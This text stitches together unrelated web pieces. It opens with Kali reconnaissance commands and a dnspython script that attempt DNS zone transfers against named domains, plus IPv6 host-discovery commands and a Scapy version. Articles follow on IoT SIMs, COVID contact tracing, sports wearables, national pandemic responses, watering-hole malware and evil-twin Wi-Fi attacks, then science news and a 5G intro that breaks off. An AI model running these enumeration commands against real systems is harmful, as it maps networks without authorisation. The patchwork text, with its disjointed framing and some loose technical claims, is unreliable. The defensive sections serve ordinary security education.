# host -t ns cover6solutions.com
Dnsrecon is one of many tools you can use to perform a zone transfer in hopes of enumerating a domain’s DNS enumeration.
# dnsrecon -d megacorpone.com -t axfr
Probably the easiest way to perform a zone transfer in Kali is to use the dnsenum tool. Keep in mind that most sites should not allow zone transfers!
# dnsenum megacorpone.com
Another quick way to attempt a zone transfer in Kali is the fierce command. Remember, most sites should not allow zone transfers!! The zone file will contain a list of all the DNS names configured in that zone. Basically, it gives you the corporate network layout.
# fierce -dns cover6solutions.com
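Zone transfers can also be attempted straight from Python with the dnspython library. The sketch below is an added illustration rather than course material; it finds the domain’s name servers and asks each for an AXFR, which should be refused by any properly configured zone.

```python
import dns.query
import dns.resolver
import dns.zone

DOMAIN = "megacorpone.com"  # example target from the text above

# Find the authoritative name servers for the zone.
nameservers = [ns.target.to_text() for ns in dns.resolver.resolve(DOMAIN, "NS")]

for ns in nameservers:
    ns_ip = dns.resolver.resolve(ns, "A")[0].to_text()
    try:
        zone = dns.zone.from_xfr(dns.query.xfr(ns_ip, DOMAIN, timeout=5))
    except Exception as exc:  # refused transfers end up here, which is the expected case
        print(f"{ns} ({ns_ip}): transfer refused or failed -> {exc}")
        continue
    print(f"{ns} ({ns_ip}): zone transfer succeeded, {len(zone.nodes)} names")
    for name in sorted(zone.nodes.keys()):
        print(" ", name)
```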
IPv6 has been out for over 21 years. It is a protocol or method of communication just like IPv4 but with over 340 undecillion more available IP addresses. How many is that? An undecillion is so large it is a 1 followed by 36 zeros! Think of it as if for every road, highway, or path that exists there is another one directly under it that not many people know about. Now add over 340 undecillion more!
Alive6 is a tool you can use to identify IPv6 hosts on the local network segment:
# atk6-alive6 -l eth0
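If the THC-IPv6 tools are not available, the same local-segment discovery idea can be approximated with Scapy by pinging the all-nodes multicast address. This is my own sketch under that assumption; the interface name is a placeholder, and like alive6 it only discovers hosts on the local link.

```python
from scapy.all import Ether, ICMPv6EchoRequest, IPv6, srp

# Ping the all-nodes link-local multicast address; every IPv6 host on the
# segment should answer, revealing its link-local address and MAC.
answered, _ = srp(
    Ether(dst="33:33:00:00:00:01") / IPv6(dst="ff02::1") / ICMPv6EchoRequest(),
    iface="eth0",       # assumed interface name
    multi=True,         # collect every response, not just the first
    timeout=2,
    verbose=False,
)
for _, reply in answered:
    print(reply[IPv6].src, reply[Ether].src)
```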
As the Internet of Things continues to expand new options for IoT connectivity emerge—a brief introduction to eUICC (or eSIM) and iSIM technologies.
The Internet of Things (IoT) or IoT ecosystem refers to the use of intelligently connected devices and systems to leverage data gathered by embedded sensors and actuators in machines and other physical objects. In simple terms, it’s everything connected to the internet or cloud networking platforms—from smartphones to cities, smart meters, industrial sites, smart homes, automobiles and many other types of connected objects and environments.
Two types of connectivity for the IoT ecosystem
The IoT ecosystem also includes M2M, or machine-to-machine connections, which refer to the direct communication between devices using any communications channel, including wired and wireless networks. M2M is not a new concept; it predates cellular communication, and has been utilized in applications such as telemetry, industrial automation, and Supervisory Control And Data Acquisition (SCADA) scenarios for a very long time.
All these types of connections can be classified into two categories: cellular and non-cellular. Cellular connections includes all wireless networks specified by 3GPP standards—2G, 3G, 4G, 5G, LTE-M and NB-IoT. Non-cellular connectivity includes: Wi-Fi, Bluetooth, Zigbee, SIGFOX or LoRa for example.
Cellular IoT connectivity: a two-sided reality
Cellular IoT is the most common connectivity service provided by mobile network operators (MNOs), but there are two angles to this.
The first is connectivity that provides high throughput services such as 2G, 3G, 4G or even 5G. The second is low power connectivity services provided by LTE-M or NB-IoT—which will also be supported by upcoming 5G releases. Low power cellular networks address connected devices that require improved coverage, low throughput, network reactivity, but also low power consumption—for devices running on batteries, for example.
All these cellular use cases require a UICC (commonly known as a SIM) in order to be able to authenticate the device to the network.
The IoT and M2M SIM: a ruggedized cousin to the smartphone SIM designed for the IoT ecosystem
SIM technology is used by MNOs to authenticate a device (or user equipment) accessing their network and services. In addition to this core function, SIM technology can support additional security capabilities like IoT SAFE that can be used by IoT service providers and Original Equipment Manufacturers (OEMs) in coordination with their MNO partners to enhance the security of IoT services.
It’s important to note that a SIM used in a smartphone is not the same type of SIM used for the IoT ecosystem. An IoT SIM is a cousin to the smartphone SIM, designed specifically for connected devices that require robust features, which can withstand extreme environmental conditions, connect on cellular low power networks, and helps to extend the battery life of connected objects such as smart meters. This type of connected device is a long-lasting product that can be on the field for several years, sometimes more than 10 years.
eUICC for IoT: connecting IoT devices with eSIM technology
Connected devices can also benefit from embedded UICC (eUICC) technology—already in use today—which is a reprogrammable SIM where the credentials of the mobile network operator can be loaded remotely to change the subscription from operator A to operator B. This type of SIM is usually embedded or soldered into a device during manufacturing. An eUICC (or eSIM) can remotely manage multiple mobile network operator subscriptions with GSMA’s Remote SIM Provisioning.
iSIM: an evolution of SIM technology for the IoT ecosystem
As the IoT ecosystem continues growing, the evolution of SIM options will also continue expanding in order to adapt to and meet new demands. A great example of this is the integrated SIM (iSIM) or integrated eUICC (ieUICC). Instead of a standard SIM or eUICC that can be plugged in or soldered, the iSIM goes a stage further by being integrated into the silicon design of a system on a chip (SoC). In terms of functionality it can be similar to a standalone SIM (with only one permanent subscription) or it can be more flexible like the eUICC (where the needed profiles can be uploaded over-the-air along the device life cycle).
The broader picture of IoT connectivity and security
There are many IoT industry verticals, big and small, and the needs of each project deployment aren’t necessarily the same. Each use case is unique and has its specific needs and requirements, and although a specific type of SIM is generally an integral part of connecting IoT devices, it is only one piece.
Connected objects also have to be managed and secured. They require updates and monitoring. It’s important to fully understand your IoT deployment needs, which include not just the right SIM, but overall end-to-end solutions.
By CHHS Extern Carly Yost
Public health jargon, previously known only by professionals in the field, is now a part of most people’s everyday vernacular. Due to the global pandemic caused by the emergence of COVID-19, contact tracing is among those previously unknown terms that are now a part of everyone’s daily lives. Several large cities across the United States have recently hired hundreds to thousands of new contact tracers in hopes of containing the spread of COVID-19 as restrictions on Stay-At-Home orders are lifted. At the same time, Google and Apple released software that would allow cities to create contact tracing apps which residents would download on their phones. While the concept of contact tracing may now be well-known, the application is still lackluster. The responsibility of contact tracing for public health ultimately falls on local government, but both individuals and companies can play their own role in contact tracing and help fill the gaps where local jurisdictions are struggling.
In the past few months, many local health departments have gone from employing a handful of contact tracers to hundreds and thousands. During this pandemic, contact tracers reach out to everyone who tests positive for COVID-19 and find out contact information for anyone who they have come in contact with in the past 14 days. However, in New York City, of those who tested positive, less than 50% gave contact information for those these came into contact with in the 14 days before the positive test. Privacy concerns seem to be the United States’ general deficiency in contact tracing in comparison to other countries. For example, other countries have required people to write down their contact information when entering businesses or large gatherings, in order to have a reliable method to trace contact even with people unknown to the person who tested positive for COVID-19. Without these kinds of regulations in the United States, it will remain a difficult task for contact tracers to find any strangers an infectious person may have come into contact with.
Although cites in the U.S. have not implemented similar methods, some have encouraged individuals to keep their own log. Upon a new phase of reopening for the city, Baltimore City Health Commissioner, Dr. Letitia Dzirasa, advised individuals to “[keep] physical or digital note of places they visit and instances and times in which they were in close contact with others for a prolonged period of time. This means places where you’ve been closer than 6 feet to others for longer than 15 minutes.” This individual contact log will make the work of the 300 new contact tracers hired by Baltimore City much more timely and effective. While the CDC website does not contain any specific guidelines for individuals tracing their own contacts, it does state that contact tracing is the key to slowing the spread of COVID-19. According to the CDC, a contact tracer will ask everyone to list names of those for whom they have been within six feet for over 15 minutes during the time they may have been infectious, and it seems keeping a personal log can only help during this process.
Not only local governments and individuals, but also companies have a newfound interest in contact tracing as they hope to bring their workforce back into full operation. The basics recommended by most health departments for businesses are temperature and health screenings, but businesses are certainly going beyond those measures to track employees’ movement once inside the building, through cell phone apps, VPN tracking on work-issued laptops, badges, or even light sensors. This of course brings up privacy concerns at the intersection of employment law, health law, and privacy law, with experts advising that the best course of action would be a vetted cell phone contact tracing app. With effective contact tracing, offices can be more assured that once they reopen, they will remain open, and if one person gets sick, there is a lower probability that an outbreak occurs across the entire office.
Contact tracing may seem as though it is just a new buzzword, but the CDC, health departments, and other experts continue echoing its utmost importance during the COVID-19 pandemic. Now is the time when individuals should consider what part they can play in contact tracing, to assist with the local resources already in place. Maintaining a log of the people you come into contact with will aid contact tracers if you do test positive for the virus. Continuously following CDC guidelines will slow the spread of COVID-19, thereby making contact tracing more manageable. Additionally, as businesses begin to reopen, research and precautions should be taken to limit the spread of COVID, which means effectively tracing contact while not violating privacy laws. Better Business Bureau Northwest and Pacific gave precautionary tips to employers hoping to utilize contact tracing, particularly to pay attention to how and where data is stored, who has access to collected data, and how much information is shared with employees. The resounding advice for employers shopping for contact tracing applications is to find one which does not permit the employer to access the data and keeps the data anonymous and preferably stored on the user’s device. The key is to protect the individual’s right to privacy, especially concerning health data, while mitigating a “direct threat” to the health and safety of everyone in the workplace. As public health experts have long known, contact tracing is now a societal responsibility and an operational necessity.
The Competition is Fierce in the World of Sports and Wearable Devices.
Wearable technology in sports is now commonplace as multiple teams and coaches look for ways to gain an advantage over their competitors. These wearable devices also allow non-professional athletes to track, monitor and improve their performance and well-being. Across all levels and types of sport, wearable device technology has a prominent presence, and it’s growing.
Sports teams are getting smarter. Their coaches and players have embraced wearable technologies to help them track and improve performance. Team coaches use the data from these devices to train athletes and to make tactical decisions. No longer do they have to rely on their gut instinct to coach a player. They now have hard data at their fingertips to improve their decision making. Wearable technology is now heavily ingrained into professional sports throughout the world.
As a result, the sports and fitness clothing markets have quickly emerged as key industries “jumping into the game” of wearable technology. Mind Commerce, a research and strategic analysis organization for the Information and Communications Technology (ICT) industry, predicts that wearable technologies in sports and fitness will reach $9.4 billion globally by 2020.
Technology has changed both professional and amateur sports. Participants and coaches alike can make calculated decisions from metrics that can be taken into account and utilized. Although mainly used for performance monitoring, this wearable device technology is also being used to mitigate the risk of injury and improve player safety.
American Football: Today, improving speed and running ability requires careful analysis of technique, and the Sensoria Fitness Sock is designed to do just that. Its sensor-filled sock, attachable anklet, and smartphone app help athletes and their coaches monitor running techniques. The sock contains e-textile sensors that measure speed, count steps and track calories, altitude, and distance. It also does something no other type of smart footwear does–track cadence, foot-landing technique and weight distribution on the foot. The electronic anklet snaps onto the sock and communicates real-time data to external devices like smartphones. And the NFL is now able not only to track their players’ performance via wearable devices but also to broadcast these stats to their TV viewers if they wish.
Baseball: Similarly, Major League Baseball has incorporated technology and data-based companies to help improve performance aspects for their players. The Whoop Strap 2.0 was approved by the league in 2017. The WHOOP device is designed to be worn day and night. It can be worn on various parts of the body, and it measures sleep, recovery, and strain. Before this approval, players could use these devices at any time other than during games. The sport’s playing rules committee recently approved two additional devices for use during games: the Motus Baseball Sleeve that measures stress on elbows and the Zephyr Bioharness that monitors heart and breathing rates.
Track and Cycling: Running and jogging are the most common forms of cardiovascular fitness in the US today. However, a whopping 70% of runners, unfortunately, suffer from foot-related injuries. The team behind the Sensoria Fitness Sock hopes to help. Just as it does for football players, the smart sock provides the feedback a runner needs, delivered as audio while they run. It acts like a coach who analyses the way they take each step. If they exhibit heel striking or unequal weight distribution that can cause injuries, the runner is alerted and can make corrections right away. Both professional and everyday runners and cyclists can benefit from this technology. Radar Pace, a joint effort between Oakley and Intel, developed glasses with earbuds attached to the temples that connect the athlete to a virtual coach advising them in real time about stride length and pace (for runners) or cadence and power output (for cyclists). The Under Armour SpeedForm Gemini 2 Record Equipped shoe ushers in the era of the smart shoe with smaller sensors and batteries. And Lumo Run gives all of these a "run for their money" with a Running Coach that also provides audio feedback to help runners stay "on track."
Basketball: At present, the National Basketball Association doesn't allow the use of wearable technology during official games. However, in training, professional basketball teams use wearables to track workloads and movement to prevent injuries. The Golden State Warriors' record this past year serves as proof of the value in data from wearable devices. They've gained a reputation for experimenting with systems like Catapult Sports trackers and OmegaWave to assess a player's functional readiness. Perhaps this is one reason the franchise has become one of the best teams in the league.
Winter Sports: Snowcookie is popular with skiers and was one of the finalists of Intel's Make it Wearable Challenge. It's a project from a Polish team to help improve skiing skills; it uses an Intel Edison to compile and process the massive amount of data that skiers generate. Snowcookie connects skiers to a network of distributed devices that can improve skiing performance. The result is a better, safer, and more connected skier.
Water Sports: For all you “water babies,” Wearable Tech has rated the best fitness trackers for water sports. Some of them include the Nokia Steel HR, the TomTom Spark 3, Garmin Vivoactive 3, Fitbit Ionic, Fitbit Flex 2, Moov Now, Samsung Gear Fit2 Pro, Misfit Shine, and Apple Watch Series 3. They also rated these devices based on how much pressure they can withstand (not how deep they can go).
Wearable devices have demonstrated great success for any athlete who needs feedback on performance. They also hold great promise in minimizing sports-related injuries and helping to provide not only training but recovery platforms. The number of professional and consumer fitness devices that are available is growing every day. Today there are more than 300 wearable fitness devices on the market. Not only is the competition fierce when it comes to sports, but it's also growing more so amongst the companies that market and sell these devices. This is good news for all of us. Having more choices is always a good thing!
Impact Of Pandemic On Different Countries
The unforeseen challenges caused by Covid-19 have not left any country in the world unaffected. A total of 203 countries and territories have been affected by the virus, not just by its spread but also economically. At a global level, the pandemic has brought the economy to an abrupt halt, disrupting the global supply chain and international trade. According to the United Nations, the global economy could shrink by up to 1 per cent in 2020 due to the pandemic, and it has warned that the contraction could deepen if restrictions on economic activities are extended without adequate fiscal responses.
Respective governments have taken different measures to control the outbreak and reduce its economic impact on their countries. While many countries are still struggling to contain the virus despite having enacted strict rules, other countries have successfully flattened the transmission curve and are on their way to economic recovery. So what did these countries do differently?
Here are a few examples of countries that have been successful in fighting Covid-19:
- New Zealand – On 8th June, the country declared that there were no active Corona cases in the country. Statistics suggest New Zealand had around 1,500 infected people, of whom 22 died. New Zealand is now Corona free. This could only happen because of one of the strictest lockdowns in the world, which was imposed swiftly, communicated effectively, and backed by intensive testing. As a result, curbs on public events, weddings, functions etc. are being gradually lifted. Shopping malls, markets, hotels, restaurants, and public transport are fully functioning, and the economy is already on its path to recovery. The government also announced a fiscal stimulus worth more than 20% of gross domestic product, predicting this sum will jump-start growth and get the jobless rate back to its pre-virus level of 4.2% within two years. The government and the central bank are forecasting a rapid recovery, with annualized growth resuming in mid-2021.
- South Korea experienced one of the world's most significant initial outbreaks of Covid-19 but successfully brought down the rate of COVID-19 transmission without even imposing a nationwide lockdown. With wide-scale testing and contact tracing, the country has been able to tackle the virus effectively. It used credit card records and phone data of infected people to identify their movements, duly informed citizens so they could avoid the routes infected people had taken, and monitored those in isolation via a web application. With the elimination of almost 90% of cases in South Korea, the country eased its social distancing norms and started to reopen schools, colleges and universities. Businesses also gradually started reopening, bringing the economy back to normal. The crisis has seen South Korean exports plunge steeply. Still, as per the latest preliminary first-quarter numbers reported by The Bank of Korea, South Korea's GDP grew 1.3% year-on-year, indicating the country's efforts to boost its economy have been successful.
- Japan came from near disaster to become a success story. This happened because of its widely praised regime of testing, tracing and treating, which flattened the curve quickly. The government on 25th May lifted the state of emergency declared due to COVID-19 because the number of new infections had decreased to mere dozens per day. Parts of Japan have exited lockdown. Still, the country's major urban areas remain under lockdown because they are densely populated and reliant on public transportation, whose use can lead to a surge in cases. Japan's economy is on the cusp of recession after two consecutive quarters of negative economic growth, but it is expected to rebound by the third quarter.
- Australia's response to COVID-19 has been hugely successful compared to the rest of the world. The country closed its borders to all foreign visitors promptly. The government announced on 22nd March that all bars, cinemas, gyms, clubs and places of worship would remain closed until further notice, while cafes and restaurants would be restricted to take-away only and supermarkets, clothing shops, chemists and beauty salons would remain open. While similar restrictions and social distancing rules were put in place in many countries, Australia also expanded its testing widely. The country's success in curbing Covid-19 infections is allowing it to ease some restrictions even as it remains mostly closed off from the rest of the world. Agriculture and mining continue to support exports, and the government is looking at ways to revive the country's manufacturing sector. As per the OECD's latest forecast, Australia is leading the developed world out of the pandemic-induced recession by providing continuous stimulus that boosts incomes and reduces unemployment.
Proper planning, readiness, and timely and aggressive implementation of measures by governments were the key to controlling the spread of the virus in these countries. As a result, these nations are now focused on rebuilding their economies.
On the other hand, the global death toll has crossed the 400,000 mark. As of 7th June, many countries remain unable to control the spread of the virus due to delays in imposing restrictions, large populations, too few restrictions, slow scaling of testing, less stringent lockdown rules, ineffective government planning and so on. Some examples of these nations are shared below:
- United States- Having watched Asian and European countries struggle against Covid-19, the US was slow to ramp up testing and order its residents to stay at home. Also, as power is not centralized in the US, a national lockdown was not easy to implement. Having downplayed the threat of the virus at its initial stage, today, the US has the highest number of Covid-19 cases in the world. The US economy had already entered a recession in February, well before the pandemic had any effect. Now the US economy is in worse shape with retail sales dropping by 8.7% and over 22 million employees, more than ever in the country’s history, filing for jobless benefits.
- Brazil- The Brazilian government's chaotic response to the virus has put the country in a difficult spot. With the country recording more than 800,000 positive cases, it is becoming more difficult by the day for Brazil to distribute test kits because of the sheer size of the country. Health administration and infrastructure are also not very robust. A failure to act early and aggressively, ongoing political turmoil, and abysmal enforcement of restriction measures have contributed significantly to making Brazil an emerging centre of the pandemic. Because of these factors, Latin America's largest economy is plunging into its steepest recession in history. The economic fallout has hit consumer goods and service industries, and the consumption of products and services has dropped drastically in Brazil.
- Russia- The Russian government made early efforts to stem the outbreak by shutting the country’s borders and assigning a special task force to combat the pandemic. But recently, it saw a spike in cases, with hospitals overflowing and doctors complaining about lack of protective gear. This can be primarily attributed to mismanagement and improper communication about the number of citizens affected by the virus. As a result, this year, the hotel and public catering industries are suffering their most significant decline in value. Also, the clothing, leather, and footwear manufacturing sectors are expected to shrink at a colossal rate.
- Spain- The main reason for the quick spread of the pandemic in Spain is very mundane. In late February and early March, with temperatures above 20C, the cafes and bars were filled to the brim with happy people, doing what they like best – being sociable. The government's decision to impose a lockdown came very late. On 8th March, just a week before the country was locked down, sports events, political gatherings, conferences and massive demonstrations to mark International Women's Day took place. Thousands of fans flew in together for Champions League matches just before the lockdown was imposed. The country lacked essential equipment like ventilators and protective gear for doctors, and coronavirus testing equipment is still being sourced from other countries. Sectors like travel, tourism, aviation and hospitality are in a vulnerable position and direly need urgent relief. Restaurants, sporting events, and many other services have been considerably disrupted.
These examples indicate that the countries which understood the gravity of the situation and took proactive measures have been successful in reducing, if not halting, the spread of the virus. It was preparedness and the timely realization that the virus posed a severe threat that let these countries beat the virus and gave them the additional time and resources to create economic stability. Adequate testing, tracing, and robust health care, supported by appropriate economic guidance from governments, have been vital to these countries sailing through COVID-19. Countries which made light of the virus and let it spread before pressing into action are not only beaten by the virus but also have economies that are bleeding. In these countries, even though the virus is not under control, governments have no choice but to end restrictions to revive the economy.
One of the common misconceptions regarding safe Web browsing habits is that as long as users stick to established sites, they will not run afoul of malware or hackers. Although avoiding questionable links is always a good practice, it will not always protect individuals from malicious content. For a variety of reasons, members of the international hacking community are constantly attempting to compromise popular websites. The culprits may simply be looking to show off to their peers by orchestrating a high profile breach, but it is just as likely that they are attempting to spread their malware through a conduit that receives tens of thousands of page views each day. To prevent these insidious programs from infecting and corrupting a system, users should maintain robust perimeter defenses such as application control programs along with a system restore and recovery solution in the event that a malicious program becomes pervasive.
According to multiple sources, several high-traffic sites reported experiencing cyberattacks in what appears to be a widespread hacking campaign directed at conservative media outlets. Those affected by the wave of activity include the Washington Free Beacon, National Journal and the Drudge Report. Cybersecurity researchers identified malicious code embedded in the content of two articles appearing on the Free Beacon's website. When viewers accessed the compromised articles, they were redirected to executable malware.
Because these articles were hosted by a number of other news outlets, the malware was able to extend its reach. The Drudge Report alone received nearly 2 million unique visitors on the day of the attack, in addition to more than 200,000 mobile-browsing readers. Once deployed, the malware strain creates a backdoor for hackers to steal information, monitor user activity and ensnare machines into their botnet environments.
A display of sophisticated cybercrime
The tactics used by the culprits have demonstrated similarities to the watering hole attacks that have become popular with cybercriminals in recent years. These assaults reflect a deepening sophistication of hacker activity as they carry out widespread campaigns while focusing on a narrow range of victims. For example, if a cybercrime syndicate wanted to infiltrate a particular company but didn't want to risk taking its network defenses head on, it could instead compromise a site frequently used by the company's employees to spread malware and bypass defenses. In this instance, it seems that the responsible hackers have targeted conservative-minded outlets and individuals.
Protecting networked workstations
Cybersecurity incidents such as this one are of particular concern to organizations that operate publicly accessible computer labs. People routinely use these machines to access high-traffic websites that can become compromised by malware. To prevent these threats from infecting an entire array of workstations, administrators should deploy system restore and recovery tools to return their computers to their original settings. More sophisticated varieties of this technology allow operators to establish customized configurations that can be restored at any time. For instance, administrators could organize their computer lab network so that workstations are returned to predetermined settings after each session. This way, whatever malicious content an individual may encounter while using a machine will be automatically removed from the system once the session has concluded.
Evil twin attacks and how to prevent them
It's natural to use public Wi-Fi to check messages or browse online when you're out and about – shopping, traveling, or simply grabbing a coffee. But using public Wi-Fi can carry risks, one of which is evil twin hacking. Read on to learn about evil twin attacks and how to avoid them.
What is an evil twin attack?
An evil twin attack takes place when an attacker sets up a fake Wi-Fi access point hoping that users will connect to it instead of a legitimate one. When users connect to this access point, all the data they share with the network passes through a server controlled by the attacker. An attacker can create an evil twin with a smartphone or other internet-capable device and some readily available software. Evil twin attacks are more common on public Wi-Fi networks which are unsecured and leave your personal data vulnerable.
How do evil twin attacks work?
Here’s how a typical evil twin Wi-Fi attack works:
Step 1: Looking for the right location
Hackers typically look for busy locations with free, popular Wi-Fi. This includes spaces like coffee shops, libraries, or airports, which often have multiple access points with the same name. This makes it easy for the hacker’s fake network to go undetected.
Step 2: Setting up a Wi-Fi access point
The hacker then takes note of the legitimate network's Service Set Identifier (SSID) and sets up a new access point with the same SSID. They can use almost any device to do this, including smartphones, laptops, tablets, or portable routers. They may use a device called a Wi-Fi Pineapple to achieve a broader range. Connected devices can't distinguish between genuine connections and fake versions.
Step 3: Encouraging victims to connect to the evil twin Wi-Fi
The hacker may move closer to their victims to create a stronger connection signal than the legitimate versions. This convinces people to select their network over the weaker ones and forces some devices to connect automatically.
Step 4: Setting up a fake captive portal
Before you can sign in to many public Wi-Fi accounts, you must submit data on a generic login page. Evil twin hackers set up a copy of this page, hoping to trick unsuspecting victims into disclosing their login credentials. Once the hackers have those, they can log in to the network and control it.
Step 5: Stealing victims’ data
Anyone who logs in connects via the hacker. This is a classic man-in-the-middle attack that allows the attacker to monitor the victim's online activity, whether scrolling through social media or accessing their bank accounts. If a user logs in to any of their accounts, the hacker can steal their login credentials – which is especially dangerous if the victim uses the same credentials for multiple accounts.
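One practical way to spot a possible evil twin is to notice when the same network name is being broadcast by more than one access point. The sketch below is an illustrative self-check, not a Kaspersky tool: it assumes a Linux laptop with NetworkManager's nmcli command available and simply flags SSIDs that appear with multiple BSSIDs. Legitimate networks with several access points (offices, campuses) will also trigger it, so treat a warning as a prompt for caution rather than proof of an attack.

```python
# Illustrative sketch: flag SSIDs advertised by more than one access point,
# a possible (though not certain) sign of an evil twin nearby.
# Assumes a Linux host with NetworkManager's `nmcli` command on the PATH.
import re
import subprocess
from collections import defaultdict

def list_access_points():
    """Return {ssid: [(bssid, signal), ...]} from a Wi-Fi scan via nmcli."""
    output = subprocess.run(
        ["nmcli", "-t", "-f", "SSID,BSSID,SIGNAL", "device", "wifi", "list"],
        capture_output=True, text=True, check=True,
    ).stdout
    networks = defaultdict(list)
    for line in output.splitlines():
        # In terse mode nmcli escapes the colons inside the BSSID ("AA\:BB\:..."),
        # so split the line only on unescaped colons.
        parts = re.split(r"(?<!\\):", line)
        if len(parts) != 3:
            continue
        ssid, bssid, signal = parts
        networks[ssid].append((bssid.replace("\\:", ":"), int(signal or 0)))
    return networks

if __name__ == "__main__":
    for ssid, access_points in list_access_points().items():
        if ssid and len(access_points) > 1:
            print(f"'{ssid}' is broadcast by {len(access_points)} access points: {access_points}")
```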
Why are evil twin attacks so dangerous?
Evil twin attacks are dangerous because, when successful, they allow hackers to access your device. This means they can potentially steal login credentials and other private information, including financial data (if the user carries out financial transactions when connected to the evil twin Wi-Fi). In addition, the hackers could also insert malware into your device.
Evil twin Wi-Fi attacks often don't leave tell-tale signs which could expose their true nature. They perform their primary task of providing access to the internet, and many victims won't question it. Users may only realize they've been victimized by an evil twin attack afterward when they notice unauthorized actions performed on their behalf.
Evil twin attack example
A person decides to visit their local coffee shop. Once they are seated with their coffee, they connect to the public Wi-Fi network. They have connected to this access point before without problem, so they have no reason to be suspicious. However, on this occasion, a hacker has set up an evil twin network with an identical SSID name. Because they are seated close to the unsuspecting target, their fake network has a stronger signal than the coffee shop’s real network. As a result, the target connects to it even though it’s listed as ‘Unsecure’.
Once online, the target logs into their bank account to transfer some money to a friend. Because they are not using a VPN or Virtual Private Network, which would encrypt their data, the evil twin network allows hackers to access their banking information. The victim only becomes aware of this later when they realize unauthorized transactions have taken place in their account, causing them financial loss.
Rogue access point vs evil twin – what's the difference?
So, what’s the difference between a rogue access point and an evil twin access point?
- A rogue access point is an illegitimate access point plugged into a network to create a bypass from outside into the legitimate network.
- By contrast, an evil twin is a copy of a legitimate access point. Its objective is slightly different: it tries to lure unsuspecting victims into connecting to the fake network to steal information.
While they are not the same, an evil twin could be considered a form of rogue access point.
What to do if you fall victim to an evil twin attack
If your data is breached through an evil twin Wi-Fi attack, or you suffer financial loss because a hacker stole money or accessed your banking information during the attack, then contact your bank or credit card company immediately. You should also change your passwords across the board (you can read tips on choosing a strong password here). Depending on the severity of the attack, you could contact your local police department too, as well as file a complaint with the relevant consumer protection body in your country.
How to protect your device from evil twins
To avoid falling victim to a fake hotspot or evil twin hacking, here are some precautions you can take:
Avoid unsecured Wi-Fi hotspots:
If you have to connect to a public network, avoid access points marked as ‘Unsecure’. Unsecured networks don't have security features, and evil twin networks nearly always have this designation. Hackers often rely on people not knowing the risks and connecting to their network anyway.
Use your own hotspot:
Using your own personal hotspot instead of public Wi-Fi will protect you from evil twin attacks. This is because you’ll be connected to a reliable network when you’re out and about, which reduces the risk of hackers accessing your data. Set a password to keep your access point private.
Check warning notifications:
If you try connecting to a network and your device alerts you to something suspicious, take notice. Not all users do, which can have negative consequences. Instead of dismissing those seemingly annoying warnings, pay attention because your device is trying to protect you from danger.
Disable auto-connect:

If you have auto-connect enabled on your device, it will automatically connect to any networks that you have used before once you're in range. This can be dangerous in public places, especially if you have unknowingly connected to an evil twin network in the past. Instead, disable the auto-connect feature whenever you're out of the home or office and let your device ask for permission first before connecting. That way, you can check the network and approve or disapprove.
Avoid logging into private accounts on public Wi-Fi:
Where possible, avoid carrying out financial or personal transactions on public Wi-Fi. Hackers can only access your login information if you use it while connected to their evil twin network, so remaining signed out can help protect your private information.
Use multi-factor authentication:
Multi-factor authentication is when two or more steps are required to log into a system. You may combine a password requirement with a code sent to your mobile phone that you need to enter to proceed. This provides an added layer of security between hackers and your information. Where accounts offer multi-factor authentication, it's worth setting it up.
Stick to HTTPS websites:
When using a public network, make sure you only visit HTTPS websites, as opposed to HTTP. (The ‘s’ stands for secure.) An HTTPS website will have end-to-end encryption, which prevents hackers from seeing what you are doing.
Use a VPN:
A VPN or Virtual Private Network protects you from evil twin attacks by encrypting your data on the internet no matter the network you are using. A reliable VPN such as Kaspersky Secure Connection encrypts or scrambles your online activity before sending it to the network, making it impossible for a hacker to read or understand.
You can also make sure to have a comprehensive security product installed. Kaspersky Internet Security protects your device from a wide range of cyberthreats.
Kaspersky Internet Security received two AV-TEST awards for the best performance & protection for an internet security product in 2021. In all tests Kaspersky Internet Security showed outstanding performance and protection against cyberthreats.
This week we learned about German bacteriologists who found a powerful new antibiotic made by a microbe that lives in people's noses, a leaf-like solar cell that turns CO2 into usable fuel and an arctic heatwave that released anthrax spores from decades-old frozen reindeer.
Proceed with caution.
Scientists at the University of Tubingen in Germany found a potent new antibiotic compound made by bacteria found in people's noses. The bacterium, Staphylococcus lugdunensis, produces a compound—called lugdunin—that prevents the growth of a different and potentially dangerous kind of staph, S. aureus. A runaway S. aureus can mutate into the dreaded, drug-resistant form known as MRSA, which kills thousands of people every year in the U.S. alone.
“We’ve found a new concept of finding antibiotics,” the journal Science quoted Tubingen bacteriologist Andreas Peschel. “We have preliminary evidence at least in the nose that there is a rich source of many others, and I’m sure that we will find new drugs there.”
Engineers at the University of Illinois at Chicago have come up with a “potentially game-changing” solar cell that traps carbon dioxide and uses sunlight to convert it into a synthetic gas that can be used as fuel.
“Unlike conventional solar cells, which convert sunlight into electricity that must be stored in heavy batteries, the new device essentially does the work of plants, converting atmospheric carbon dioxide into fuel, solving two crucial problems at once,” the team wrote in a news release. “A solar farm of such ‘artificial leaves’ could remove significant amounts of carbon from the atmosphere and produce energy-dense fuel efficiently.”
Scientists at Columbia University have developed a flexible sheet camera that adapts its optics when it is wrapped around objects and keeps gathering high-quality images. Shree Nayar, the Columbia professor of computer science who designed the device, built the camera with a colleague using an elastic array of adaptive lenses "that enables the focal length of each lens in the sheet camera to vary with the local curvature."
Said Nayar: “Cameras today capture the world from essentially a single point in space. We believe there are numerous applications for cameras that are large in format but very thin and highly flexible.”
Researchers have been playing with superatoms—clusters of atoms that have the ability to emulate the properties of different elements. They’ve already made a cluster of aluminum atoms behave like the chemical element germanium. Now a team from Columbia University led by Xavier Roy built the first molecule made from superatoms. The breakthrough could lead to faster computers, better sensors and denser computer memory.
“These superatom molecules have a rich electrochemical profile and chart a path to a whole family of superatom molecules with new and unusual properties,” Roy and his team wrote in the journal Nano Letters. “We’re aiming to make things where the whole is greater than the sum of the parts,” Roy told New Scientist.
An arctic heat wave sounds like an oxymoron, but that's what's happening in western Siberia this summer. With temperatures as high as 95 degrees Fahrenheit (35 Celsius), the thawing tundra has apparently released anthrax spores that have spent 75 years hibernating inside a reindeer carcass. For the first time since the 1940s, anthrax has sickened people and killed reindeer in the area.
The Washington Post quoted a 2011 paper by a pair of Russian scientists who warned that “as a consequence of permafrost melting, the vectors of deadly infections of the 18th and 19th centuries may come back, especially near the cemeteries where the victims of these infections were buried.”
What is 5G?
5G stands for “fifth generation.” Same goes for 4G, 3G, all the way down to 1G. Most of us are used to 3G and 4G networks, because they were the last major upgrade to our mobile communication. So, what makes each generation different from one another, and what makes 5G so special?
